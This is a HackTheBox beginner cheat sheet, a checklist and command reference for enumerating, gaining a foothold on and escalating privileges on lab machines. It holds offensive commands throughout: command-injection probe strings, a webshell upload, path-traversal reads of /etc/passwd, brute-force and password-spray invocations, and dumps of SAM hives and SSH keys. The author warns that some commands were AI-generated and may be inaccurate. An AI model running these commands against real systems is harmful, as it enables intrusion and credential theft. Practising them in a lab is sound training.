HackTheBox - Beginner Cheat Sheet
HackTheBox - Beginner Cheat Sheet
This template is for:
Beginners looking to start HackTheBox
Players looking to solve easy boxes
Players who want to have a more organised methodology
How to use this template:
Make a copy
Delete these sections that you donβt need (like this one)
As you learn more techniques, checks and tools, add it to your version of the list
For each box you do, check items off as you go
If you want to follow me or contribute, you can find me here https://linktr.ee/appsecexplained
Good luck!
Simple Methodology Checklist
Below is all of the basic steps and checks that we should work through as a minimum when looking at a target. A lot of the time one of these steps will reveal or solve the current step youβre on.
Enumeration
Foothold
PrivEsc
Key resources
PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
HackTricks: https://book.hacktricks.xyz book.hacktricks.xyz
Exploit-DB: https://www.exploit-db.com Exploit Database
GTFOBins: https://gtfobins.github.io gtfobins.github.io
LOLBAS (Living-Off-The-Land Binaries & Scripts): https://lolbas-project.github.io LOLBAS
PEASS-ng (LinPEAS / WinPEAS): https://github.com/peass-ng/PEASS-ng GitHub
SecLists: https://github.com/danielmiessler/SecLists GitHub
revshells.com (Reverse-shell generator): https://www.revshells.com Revshells
Pentestmonkey Reverse Shell Cheat-Sheet: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet pentestmonkey.net
Box list for starting out
Commands & tools reference
Note, for this section I used AI to generate some of the commands to save a bit of time, Iβve checked through but it might not be 100%.
Enumeration
Nmap scans
nmap -A <target> -oN scan.initialβ(quick service & version scan)nmap -p- -A <target> -T4 -oN scan.fullβ(full-port TCP)nmap -p- -sU --top-ports 200 <target> -oN scan.udpβ(top UDP)
Service fingerprinting
Banner-grab
nc -nv <target> 80β(then typeHEAD / HTTP/1.0)curl -sv http://<target>/ -o /dev/nullopenssl s_client -connect <target>:443 -servername <target> | head
Searchsploit / Google versions
searchsploit "Apache Tomcat 7.0.88"searchsploit --nmap scan.initialGoogle-fu --
"<service> <version> exploit"
Web recon
Web stack & technologies
whatweb -a 3 http://<target>httpx -tech-detect -title -status -ip -o tech.txtBrowser add-on: Wappalyzer
Sub-domains
ffuf -u http://<target> -H "Host: FUZZ.<target>" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 4242feroxbuster --vhost -u http://<target> -w subdomains.txt
Endpoints / directories
ffuf -u http://<target>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,307,401,403dirsearch -u http://<target> -e php,txt,bak
Parameters
arjun -u http://<target>/search.phpparamspider -d <target-domain>
Injection points
Manual probe in Burp Repeater:
test' "$IFS$(id)etc.wfuzz -u http://<target>/page.php?id=FUZZ -w /usr/share/wordlists/others/sql.txt --hc 404
Framework / CMS versions
WordPress:
wpscan --url http://<target> --enumerate ap,at,tt,u --api-token <token>Drupal:
droopescan scan drupal -u http://<target>Joomla:
joomscan --url http://<target>
Additional enumeration
SNMP
snmpwalk -v2c -c public <target> 1
β
NFS shares
showmount -e <target> β mount -t nfs <target>:/share /mnt
β
SMB
smbclient -L //<target> -N (no pass) / enum4linux -a <target> / smbmap -H <target>
net view \\\\<target>
FTP
ftp <target> (try anonymous) / lftp <ftp://anonymous>@<target>
Windows built-in ftp
DNS zone transfer
dig axfr @ns1.<domain> <domain> / host -l <domain> ns1.<domain>
nslookup -type=any l <domain> ns1.<domain>
SMTP (user enum)
swaks --to user@<target> --server <target> --quit / nc <target> 25 then VRFY root
telnet <target> 25
LDAP
ldapsearch -x -h <target> -b "dc=corp,dc=htb,dc=local"
ldapsearch.exe from WSL or ported binaries
Foothold
Low-hanging fruit
Anonymous FTP
ftp <target> β anonymous / <blank>
List SMB shares
smbclient -L //<target> -N
Default logins
nmap --script http-default-accounts -p80,8080 <target> / hydra -L users.txt -P passwords.txt <target> http-get /admin
Search for known exploits
searchsploit -m 49283β(download exploit)msfconsole -qβsearch CVE-2021-41773βuse exploit/multi/http/apache_path_traversal
Credential attacks
Password reuse / spray:
crackmapexec smb <target> -u users.txt -p "Summer2024"Brute-force:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<target>Hash-crack:
john --wordlist=rockyou.txt hash.txt
Web attacks
Command injection
curl -G "http://<target>/ping?ip=127.0.0.1;id"
File uploads
curl -F "[email protected]" http://<target>/upload.php then browse /uploads/shell.php
SQLi
sqlmap -u "http://<target>/item.php?id=1" --batch --current-db
Other (LFI/RFI)
curl "http://<target>/index.php?page=../../../../etc/passwd"
CMS exploit
wpscan --url http://<target> --enumerate vp --api-token <token> then searchsploit <vuln>
Privilege Escalation
Quick recon
Users / groups / env
cat /etc/passwdβ|βnet user /domaingroupsβ|βwhoami /groupsenv/printenvβ|βset
Files & directories (pick & mix)
SSH keys β
cat ~/.ssh/id_rsaSAM & SYSTEM β
reg save HKLM\\\\SAM sam+reg save HKLM\\\\SYSTEM system
Automated enum
./linpeas.sh -aβ|βwinpeas.exe cmd > winpeas.txt./pspy64(watch cron / processes)
Suspicious services
systemctl list-units --type=service(Linux)sc queryex type=service/wmic service get name,pathname,startmode(Windows)
Kernel exploits
uname -rβ if < 4.8 consider DirtyCow (searchsploit dirtycow)windows-exploit-suggester.py --systeminfo systeminfo.txt(classic)
If you spot sudo NOPASSWD, consult GTFOBins.
If you find SeImpersonatePrivilege, drop PrintSpoofer/Incognito/JuicyPotato.
Last updated